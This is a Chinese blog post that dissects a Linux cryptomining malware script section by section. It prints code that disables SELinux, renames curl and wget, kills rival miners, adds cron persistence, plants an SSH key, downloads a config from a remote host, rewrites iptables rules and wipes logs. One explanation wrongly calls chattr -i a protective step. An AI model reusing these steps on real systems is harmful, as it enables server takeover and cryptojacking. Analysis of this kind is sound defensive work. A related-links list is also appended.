数据库的挖矿脚本怎么写
发布时间 - 2023-05-20 00:00:00 点击率:次01.code 1
#!/bin/sh
脚本的第一行,看起来是一行注释,但其实并不是。它规定了接下来的脚本,将要采用哪一个 SHELL 执行。
像我们平常用的 bash、zsh 等,属于 sh 的超集,这个脚本使用 sh 作为执行的 shell,具有更好的可移植性。
02.Code 2
setenforce 0 2>dev/null echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null
setenforce 是 Linux 的 selinux 防火墙配置命令,执行 setenforce 0 表示关闭 selinux 防火墙。2 代表的是标准错误(stderr)的意思。
因此,可以通过使用重定向符号将命令的错误输出传送到 /dev/null 设备来避免错误的输出。这个设备是一个虚拟设备,意思是什么都不干。非常适合静悄悄的干坏事。
03.Code 3
sync && echo 3 >/proc/sys/vm/drop_caches
脚本贴心的帮我们释放了一些内存资源,以便获取更多的资源进行挖矿。
众所周知,Linux 系统会随着长时间的运行,会产生很多缓存,清理方式就是写一个数字到 drop_caches 文件里,这个数字通常为 3。
sync 命令将所有未写的系统缓冲区写到磁盘中,执行之后就可以放心的释放缓存了。
04.Code 4
crondir='/var/spool/cron/'"$USER" cont=`cat ${crondir}` ssht=`cat /root/.ssh/authorized_keys` echo 1 > /etc/sysupdates rtdir="/etc/sysupdates" bbdir="/usr/bin/curl" bbdira="/usr/bin/cur" ccdir="/usr/bin/wget" ccdira="/usr/bin/wge" mv /usr/bin/wget /usr/bin/get mv /usr/bin/xget /usr/bin/get mv /usr/bin/get /usr/bin/wge mv /usr/bin/curl /usr/bin/url mv /usr/bin/xurl /usr/bin/url mv /usr/bin/url /usr/bin/cur没错,上面这些语句就是完成了一些普通的操作。需要注意的是,它使用 mv 命令对我们常用的一些命令进行了重命名。
这在执行命令的时候,就会显得分成功能的蛋疼。这脚本已经更改了计算机的一些文件,属于犯罪的范畴了。
脚本为了复用一些功能,抽象出了很多的函数。我们直接跳到 main 函数的执行,然后看一下这个过程。
05.Code 5
首先是 kill_miner_proc 函数。代码很长,就不全部贴出来了。
kill_miner_proc() { ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9 ... pkill -f biosetjenkins pkill -f Loopback ... crontab -r rm -rf /var/spool/cron/*挖矿领域是一个相爱相杀的领域。这个方法首先使用 ps、grep、kill 一套组合,干掉了同行的挖矿脚本,然后停掉了同行的 cron 脚本,黑吃黑的感觉。
在这段脚本里,使用了 pkill 命令。这个命令会终止进程,并按终端号踢出用户,比较暴力。
06.Code 6
接下来执行的是 kill_sus_proc 函数。
ps axf -o "pid"|while read procid do ... done
ps 加上 o 参数,可以指定要输出的列,在这里只输出的进程的 pid,然后使用 read 函数,对 procid 进行遍历操作。
07.Code 7
ls -l /proc/$procid/exe | grep /tmp if [ $? -ne 1 ] then ... fi
上面就是遍历操作过程了,我们可以看到 if 语句的语法。其中 $? 指的是上一个命令的退出状态。
0 表示没有错误,其他任何值表明有错误。"tmp"是可匹配的字符串,即"-ne"表示不等于。
08.Code 8
ps axf -o "pid %cpu" | awk '{if($2>=40.0) print $1}' | while read procid do ... done呵呵,上面又来了一次循环遍历。不过这次针对的目标,是 CPU 使用超过 40% 的进程。这就有点狠了:影响我挖矿的进程,都得死!相煎何太急。
09.Code 9
再接下来,脚本针对不同的用户属性,进行了不同的操作。
首先是 root 用户。通过判断是否存在 $rtdir 文件,来确定是否是 root 权限。
chattr -i /etc/sysupdate* chattr -i /etc/config.json* chattr -i /etc/update.sh* chattr -i /root/.ssh/authorized_keys* chattr -i /etc/networkservice
使用 chattr 命令将一些关键文件设为只读属性,防止不必要的修改是明智的安全措施。然后,操作 cron 程序,把脚本的更新服务加入到定时中。
就是下面这段脚本。
10.Code 10
if [ ! -f "/usr/bin/crontab" ] then echo "*/30 * * * * sh /etc/update.sh >/dev/null 2>&1" >> ${crondir} else [[ $cont =~ "update.sh" ]] || (crontab -l ; echo "*/30 * * * * sh /etc/update.sh >/dev/null 2>&1") | crontab - fi注意 [[ $cont =~ "update.sh" ]] 这以小段代码,怪异的很。Shell中内置的[[ ]]命令支持字符串的模式匹配。
=~ 可以使用 shell 正则表达式,这让它变得非常强大。由于它的输出结果为布尔类型,因此可以使用||进行连接。
而后面的单小括号 (),是的是一个命令组,括号中多个命令之间用分号隔开,最后一个命令可以没有分号;和 `cmd` 的效果基本是一样的。
11.Code 11
搞完了定时任务,就要配置 ssh 自动登录了,通过把公钥追加到信任列表中就可以。
chmod 700 /root/.ssh/ echo >> /root/.ssh/authorized_keys chmod 600 root/.ssh/authorized_keys echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9WKiJ7yQ6HcafmwzDMv1RKxPdJI/
12.Code 12
说曹操曹操就到,下面的脚本就使用了 `` 进行操作。
filesize_config=`ls -l /etc/config.json | awk '{ print $5 }'` if [ "$filesize_config" -ne "$config_size
" ] then pkill -f sysupdate rm /etc/config.json downloads $config_url /etc/config.json $config_url_backup else echo "no need download" fi进行一系列操作以获取配置文件的大小,如果文件大小不符合要求,则重新下载一个文件。这就用到了 downloads 函数。
shell 中的函数,看起来比较怪异,后面的参数传递,就像是脚本传递一样,传送给函数。
13.Code 13
downloads $config_url /etc/config.json $config_url_backup
这句话,就传递了三个参数。当然,文件要从遥远的服务器上下载。我们一无所知,除了域名以 .de 结尾,表明它是德国的域名。
downloads() { if [ -f "/usr/bin/curl" ] then echo $1,$2 http_code=`curl -I -m 10 -o /dev/null -s -w %{http_code} $1` if [ "$http_code" -eq "200" ] then curl --connect-timeout 10 --retry 100 $1 > $2 elif [ "$http_code" -eq "405" ] then curl --connect-timeout 10 --retry 100 $1 > $2 else curl --connect-timeout 10 --retry 100 $3 > $2 fi elif [ -f "/usr/bin/cur" ] then http_code = `cur -I -m 10 -o /dev/null -s -w %{http_code} $1` if [ "$http_code" -eq "200" ] then cur --connect-timeout 10 --retry 100 $1 > $2 elif [ "$http_code" -eq "405" ] then cur --connect-timeout 10 --retry 100 $1 > $2 else cur --connect-timeout 10 --retry 100 $3 > $2 fi elif [ -f "/usr/bin/wget" ] then wget --timeout=10 --tries=100 -O $2 $1 if [ $? -ne 0 ] then wget --timeout=10 --tries=100 -O $2 $3 fi elif [ -f "/usr/bin/wge" ] then wge --timeout=10 --tries=100 -O $2 $1 if [ $? -eq 0 ] then wge --timeout=10 --tries=100 -O $2 $3 fi fi }我觉得这段代码的作者写得很差,非常长,没有体现自己的实际水平。应该是赶工期,没有想好代码的复用,才会写的这么有失水准。
我们上面说到,脚本改了几个命令的名字,其中就有 curl。该命令非常强大,以至于脚本作者不得不添加多个参数
-I:用来测试 http 头信息。
-m:设置最大传输时间。
-o:指定保持的文件名。这里是 /dev/null,呃呃呃......
-s:静默模式,不输出任何东西。
--connect-timeout:连接超时时间。
--retry:重试次数,好狠,100 次。
如果没有 curl?那就使用替补的 wget,套路都是一样的。
14.Code 14
接下来是一系列相似的操作,最后,对 iptables 一批操作。
iptables -F iptables -X iptables -A OUTPUT -p tcp --dport 3333 -j DROP iptables -A OUTPUT -p tcp --dport 5555 -j DROP iptables -A OUTPUT -p tcp --dport 7777 -j DROP iptables -A OUTPUT -p tcp --dport 9999 -j DROP iptables -I INPUT -s 43.245.222.57 -j DROP service iptables reload
15.Code 15
细心的脚本编写者,还使用命令清理了操作日志。
history -c echo > /var/spool/mail/root echo > /var/log/wtmp echo > /var/log/secure echo > /root/.bash_history
# 的是
# 是一个
# 遍历
# 这段
# 挖矿
# 多个
# 这就
# 掉了
# 可以使用
# 改了
相关栏目:
【
网站优化151355 】
【
网络推广146373 】
【
网络技术251813 】
【
AI营销90571 】
相关推荐:
Laravel如何实现一对一模型关联?(Eloquent示例)
简历在线制作网站免费版,如何创建个人简历?
如何制作公司的网站链接,公司想做一个网站,一般需要花多少钱?
Python正则表达式进阶教程_复杂匹配与分组替换解析
如何快速登录WAP自助建站平台?
在线制作视频的网站有哪些,电脑如何制作视频短片?
JavaScript如何实现音频处理_Web Audio API如何工作?
教你用AI将一段旋律扩展成一首完整的曲子
linux写shell需要注意的问题(必看)
Laravel任务队列怎么用_Laravel Queues异步处理任务提升应用性能
Laravel怎么写单元测试_PHPUnit在Laravel项目中的基础测试入门
Laravel PHP版本要求一览_Laravel各版本环境要求对照
成都网站制作公司哪家好,四川省职工服务网是做什么用?
ai格式如何转html_将AI设计稿转换为HTML页面流程【页面】
Laravel用户认证怎么做_Laravel Breeze脚手架快速实现登录注册功能
如何在阿里云服务器自主搭建网站?
高防网站服务器:DDoS防御与BGP线路的AI智能防护方案
,在苏州找工作,上哪个网站比较好?
桂林网站制作公司有哪些,桂林马拉松怎么报名?
Win11怎么更改系统语言为中文_Windows11安装语言包并设为显示语言
Laravel如何实现RSS订阅源功能_Laravel动态生成网站XML格式订阅内容【教程】
Laravel用户密码怎么加密_Laravel Hash门面使用教程
Laravel如何配置和使用队列处理异步任务_Laravel队列驱动与任务分发实例
详解Nginx + Tomcat 反向代理 如何在高效的在一台服务器部署多个站点
ChatGPT 4.0官网入口地址 ChatGPT在线体验官网
佛山企业网站制作公司有哪些,沟通100网上服务官网?
弹幕视频网站制作教程下载,弹幕视频网站是什么意思?
C++用Dijkstra(迪杰斯特拉)算法求最短路径
javascript日期怎么处理_如何格式化输出
如何用JavaScript实现文本编辑器_光标和选区怎么处理
米侠浏览器网页背景异常怎么办 米侠显示修复
如何在建站主机中优化服务器配置?
Laravel如何实现密码重置功能_Laravel密码找回与重置流程
Python文件异常处理策略_健壮性说明【指导】
独立制作一个网站多少钱,建立网站需要花多少钱?
laravel怎么为应用开启和关闭维护模式_laravel应用维护模式开启与关闭方法
Python面向对象测试方法_mock解析【教程】
Win11怎么开启自动HDR画质_Windows11显示设置HDR选项
Win11怎么关闭资讯和兴趣_Windows11任务栏设置隐藏小组件
专业企业网站设计制作公司,如何理解商贸企业的统一配送和分销网络建设?
北京网站制作费用多少,建立一个公司网站的费用.有哪些部分,分别要多少钱?
Python函数文档自动校验_规范解析【教程】
如何打造高效商业网站?建站目的决定转化率
图册素材网站设计制作软件,图册的导出方式有几种?
Laravel如何与Pusher实现实时通信?(WebSocket示例)
IOS倒计时设置UIButton标题title的抖动问题
Laravel Artisan命令怎么自定义_创建自己的Laravel命令行工具完全指南
详解Nginx + Tomcat 反向代理 负载均衡 集群 部署指南
详解Android图表 MPAndroidChart折线图
php结合redis实现高并发下的抢购、秒杀功能的实例


" ] then pkill -f sysupdate rm /etc/config.json downloads $config_url /etc/config.json $config_url_backup else echo "no need download" fi